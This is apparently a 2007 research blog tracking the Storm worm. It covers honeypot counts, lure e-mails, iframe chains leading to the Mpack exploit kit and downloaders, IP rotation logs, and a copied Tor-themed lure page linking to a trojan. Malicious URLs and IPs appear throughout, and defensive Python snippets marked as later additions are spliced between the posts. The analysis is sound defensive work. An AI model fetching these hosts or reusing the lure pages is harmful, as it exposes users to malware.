Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either via p2p, in DDOS attacks, or spreading 'spa-m-alware' (mostly the latter, since our smtp honeypot is set up to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and is working to change his sites. SuperLaugh will be spammed using the ruse 'a funny cat e-card.'

Lending an air of credibility to the scam, SuperLaugh.com, which is a legitimate e-card site, also has a file called SuperLaugh.exe, downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe, with an MD5 sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.
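The point of the two SuperLaugh.exe files, and of the "uniquely hashed downloads" count above, is that a filename identifies nothing; only the hash does. Below is an added example, not code from the post, that deduplicates captured samples by hash and checks a download against a known-good hash. The known-good MD5 is the one quoted above for the legitimate file; the sample byte strings are constructed stand-ins, not real binaries.

```python
import hashlib

# Known-good MD5 of the legitimate SuperLaugh.exe, as quoted in the post.
KNOWN_GOOD_MD5 = {
    "SuperLaugh.exe": "571dd3cec20da6c70a3b62fa9f3637a8",
}


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def sha256_hex(data: bytes) -> str:
    # MD5 is fine for matching an already-published hash, but collisions are
    # practical, so store SHA-256 alongside it for anything you catalogue.
    return hashlib.sha256(data).hexdigest()


def dedupe_by_hash(samples):
    """samples: iterable of (filename, bytes) pairs as captured by a sensor.

    Returns a dict md5 -> sorted list of filenames seen with that content,
    so the same binary served under several names collapses to one entry.
    """
    by_hash = {}
    for filename, data in samples:
        by_hash.setdefault(md5_hex(data), set()).add(filename)
    return {h: sorted(names) for h, names in by_hash.items()}


def classify_download(filename, data, known_good=KNOWN_GOOD_MD5):
    """'known-good' if the content matches the published hash for that name,
    'impostor' if the name is known but the content differs, 'unknown'
    if we hold no reference hash for that filename."""
    expected = known_good.get(filename)
    if expected is None:
        return "unknown"
    return "known-good" if md5_hex(data) == expected else "impostor"


# Constructed sample captures (not real malware): two names, same content.
SAMPLES = [
    ("SuperLaugh.exe", b"constructed sample A"),
    ("file.php", b"constructed sample A"),
    ("tracker.exe", b"constructed sample B"),
]

if __name__ == "__main__":
    for h, names in dedupe_by_hash(SAMPLES).items():
        print(h, names)
    print(classify_download("SuperLaugh.exe", b"constructed sample A"))
```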

Malware Page:



Legit Page:


(The pages are both animations, the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static HTML code, the authors are also attaching the Mpack xor'd javascript to the end of their pages. The javascript attempts to exploit several old vulnerabilities in Windows and third-party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISPs are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null routing those domains. We're still getting activity on the following domains:
ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com
We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information we believe he launched a JoeJob attack as described in the last blog entry.

We've seen researchers using TOR to capture binaries or communicate with the network, we see denial of service attacks on high profile IPs, probably related to researchers' honeypots, and we suspect we've seen a few attempted takeover attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second rate script kiddy.



Friday, September 28, 2007

Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс [Translation: Look what they're writing about you, you bitch, everyone look! Here's the address]
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4


the sid=1 sid=2 and sid=3 pages are all fake error pages with more iframes:

http:// bl0cker.info /mail/cn.php
http:// lem0n.info /xxx/iframe.php
http:// lem0n.info /xxx/m/iframe.php
http:// bl0cker.org /xxx/iframe.php
http:// space-sms.info /xxx/iframe.php
http:// bl0cker.info /bn/index.php


sid=4 is a javascript encoded page that tries to download http:// bl0cker.info /bn/exe.php

So how deep can it get? I followed the white rabbit through a few more links:

cn.php is an iframe that points to http:// eliteproject.cn /ts/in.cgi?alex

lem0n.info /xxx/iframe.php is a javascript that points to http:// bl0cker.info /bn/index.php

lem0n.info /xxx /m/iframe.php: is a lot of errors:

Warning: fopen(redir.txt) [function.fopen]: failed to open stream:
Permission denied in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 40

Warning: flock() expects parameter 1 to be resource, boolean
given in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 41

Warning: ftruncate(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 42

Warning: fwrite(): supplied argument is not a valid stream
resource in /usr/home/lem0n/domains/lem0n.info/public_html/xxx/m/iframe.php
on line 43

Same errors in http://bl0cker.org /xxx/iframe.php and http:// space-sms.info /xxx/iframe.php.

eliteproject.cn /ts/ in.cgi?alex is an mpack that points to http:// superengine.cn /1278/file.php (binary file)
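Following a chain like this by hand is how the list above was built; the same walk can be done offline once the pages are saved. The following is an added example, not code from the post: it extracts iframe, frame and script src references from saved HTML and walks the chain breadth-first over an in-memory page store, so nothing is fetched from the network. The page bodies below are constructed stand-ins that mirror the structure described in the post (the real pages carried encoded javascript, which this does not reproduce).

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class RefExtractor(HTMLParser):
    """Collect src targets of iframe, frame and script tags."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("iframe", "frame", "script") and a.get("src"):
            self.refs.append(a["src"])


def extract_refs(base_url, html):
    """Return absolute URLs referenced by the page, in document order."""
    p = RefExtractor()
    p.feed(html)
    return [urljoin(base_url, r) for r in p.refs]


def map_chain(start, fetch, max_depth=10):
    """Breadth-first walk from `start`. `fetch(url)` returns the page body
    or None (404, timeout). Returns a dict url -> list of child urls;
    a page that returned nothing or has no references maps to []."""
    graph = {}
    frontier = [(start, 0)]
    while frontier:
        url, depth = frontier.pop(0)
        if url in graph or depth > max_depth:  # cycles and depth bound
            continue
        body = fetch(url)
        children = extract_refs(url, body) if body else []
        graph[url] = children
        frontier.extend((c, depth + 1) for c in children)
    return graph


def leaves(graph):
    """Pages with no outgoing references: where payloads usually sit."""
    return sorted(u for u, kids in graph.items() if not kids)


def hosts(graph):
    """Distinct hostnames touched by the chain."""
    return sorted({urlsplit(u).hostname for u in graph})


# Constructed page store mirroring the chain described in the post.
PAGES = {
    "http://bl0cker.info/":
        '<html><iframe src="http://58.65.239.66/~lem0n/st/go.php?sid=1"></iframe>'
        '<iframe src="http://58.65.239.66/~lem0n/st/go.php?sid=4"></iframe></html>',
    "http://58.65.239.66/~lem0n/st/go.php?sid=1":
        '<html><h1>404 Not Found</h1>'
        '<iframe src="http://bl0cker.info/mail/cn.php"></iframe>'
        '<iframe src="http://lem0n.info/xxx/iframe.php"></iframe></html>',
    "http://58.65.239.66/~lem0n/st/go.php?sid=4":
        '<html><script>/* encoded loader not reproduced */</script></html>',
    "http://bl0cker.info/mail/cn.php":
        '<iframe src="http://eliteproject.cn/ts/in.cgi?alex"></iframe>',
    "http://lem0n.info/xxx/iframe.php":
        '<script src="http://bl0cker.info/bn/index.php"></script>',
    "http://eliteproject.cn/ts/in.cgi?alex":
        '<iframe src="http://superengine.cn/1278/file.php"></iframe>',
    # bl0cker.info/bn/index.php and superengine.cn file.php: not stored -> None
}


def fetch_saved(url):
    return PAGES.get(url)


if __name__ == "__main__":
    g = map_chain("http://bl0cker.info/", fetch_saved)
    for url, kids in g.items():
        print(url, "->", kids)
    print("leaves:", leaves(g))
    print("hosts:", hosts(g))
```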

In summary, possible new Storm domains:

superengine.cn
eliteproject.cn
space-sms.info
lem0n.info
bl0cker.org
bl0cker.info

None of these are fast-flux -- yet.

Space-sms, lem0n.info, bl0cker.org and bl0cker.info all use the same name servers, ns1 and ns2.spektor.ws.

NS2 points to the same IP (58.65.239.66) as the A records for the new domains.


Saturday, September 08, 2007

Stormworm Tactics Change to Football Fungus

Some recent changes involving storm:

Starting about 13:50 GMT, Randy V noticed the domains started rotating their IPs less frequently. Looking back at my logs I came up with this:

2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
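The rotation log above is exactly the kind of record you want to summarise when watching a fast-flux domain: how many addresses were served, how long each lasted, and whether any of them are not routable at all (127.0.0.1 at the end). The following is an added example, not code from the post, that parses the log lines as they appear above, computes per-address lifetimes and the change rate, and flags addresses that are not globally routable. The log text is copied from the post; the function names are my own.

```python
import re
import ipaddress
from datetime import datetime, timezone

# Log lines as they appear in the post (first line has no end time,
# last line runs to "NOW").
ROTATION_LOG = """\
2007-09-08 13:49 (GMT): 12.216.204.171
2007-09-08 13:49 (GMT) - 2007-09-08 13:57 (GMT): 208.115.203.105
2007-09-08 13:58 (GMT) - 2007-09-08 14:03 (GMT): 76.226.146.196
2007-09-08 14:04 (GMT) - 2007-09-08 14:20 (GMT): 72.40.18.87
2007-09-08 14:21 (GMT) - 2007-09-08 14:30 (GMT): 209.30.158.167
2007-09-08 14:31 (GMT) - 2007-09-08 14:49 (GMT): 70.129.33.116
2007-09-08 14:50 (GMT) - 2007-09-08 15:15 (GMT): 74.73.209.16
2007-09-08 15:17 (GMT) - 2007-09-08 15:26 (GMT): 121.114.132.128
2007-09-08 15:26 (GMT) - 2007-09-08 15:34 (GMT): 75.132.218.100
2007-09-08 15:35 (GMT) - 2007-09-08 15:43 (GMT): 75.66.243.62
2007-09-08 15:44 (GMT) - NOW: 127.0.0.1
"""

TS = r"(\d{4}-\d\d-\d\d \d\d:\d\d) \(GMT\)"
LINE_RE = re.compile(rf"^{TS}(?: - (?:{TS}|(NOW)))?: (\S+)$")


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M").replace(tzinfo=timezone.utc)


def parse_rotation_log(text):
    """Return a list of (start, end, ip). `end` is None when the entry is
    still current ("NOW"); a single-timestamp line gets end == start."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed log line: {line!r}")
        start, end, now, ip = m.groups()
        t0 = _ts(start)
        t1 = None if now else (_ts(end) if end else t0)
        entries.append((t0, t1, ip))
    return entries


def durations_minutes(entries):
    """Lifetimes of the closed entries, in minutes."""
    return [int((e - s).total_seconds() // 60) for s, e, _ in entries if e]


def changes_per_hour(entries):
    """Address changes per hour over the span first start .. last start."""
    span = (entries[-1][0] - entries[0][0]).total_seconds() / 3600
    return (len(entries) - 1) / span if span else float("inf")


def unroutable(entries):
    """Addresses that cannot be a real peer (loopback, private, reserved)."""
    return sorted({ip for _, _, ip in entries
                   if not ipaddress.ip_address(ip).is_global})


if __name__ == "__main__":
    ents = parse_rotation_log(ROTATION_LOG)
    print(len(ents), "entries,", len({ip for *_, ip in ents}), "distinct IPs")
    print("lifetimes (min):", durations_minutes(ents))
    print(f"changes/hour: {changes_per_hour(ents):.2f}")
    print("unroutable:", unroutable(ents))
```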

From 15:44 to ~17:00 the index page showed:

Welcome to nginx!

Now the index page is NFL related (and nicely done) and is sharing NFLTracker.exe (NFLTracker.exe - Infected: Trojan.Peed.III). It's not using any of the xor'd javascript or browser exploits. This page is strictly social engineering.

(DISOG Screen Capture: Sept 8, 2007)

Our guess is the domains will be changing soon, with football related names - or that there will be mass infection of football related sites with frames pointing to the peer pages.



UPDATE: Binary is now called 'tracker.exe'


Thursday, September 06, 2007

CME711 (Storm) using TOR ruse

This morning I woke up to the latest storm page...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Tor: anonymity online</title>
</head>
<body>
<table border=0 width="500">
<tr><td><img src="img/tor1.gif"></td><td><h2>Tor: anonymity online</h2></td></tr>
<tr><td colspan="2">
<br>
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
<br><br>
Tor aims to defend against traffic analysis, a form of network surveillance that threatens personal anonymity and privacy, confidential business activities and relationships, and state security. Communications are bounced around a distributed network of servers called onion routers, protecting you from websites that build profiles of your interests, local eavesdroppers that read your data or learn what sites you visit, and even the onion routers themselves.<br><br>
<a href="tor.exe"><img src="img/tor2.png" border=0></a>
</td></tr>
</table>
</body>
</html>
The text is a word for word cut and paste from the official TOR website, tor.eff.org.

In summary, they're wagering more clicks by offering The Onion Router (TOR) Proxy. Of course the binary is the standard CME711 trojan, nothing so fancy. At least they could have included TOR in the download!

The files file.php, sony.exe and tor.exe are resolving while video.exe, setup.exe and labor.exe no longer resolve.

UPDATE: TrendMicro has a nice writeup on this too: http://blog.trendmicro.com/nuwar-poses-as-tor-proxy/
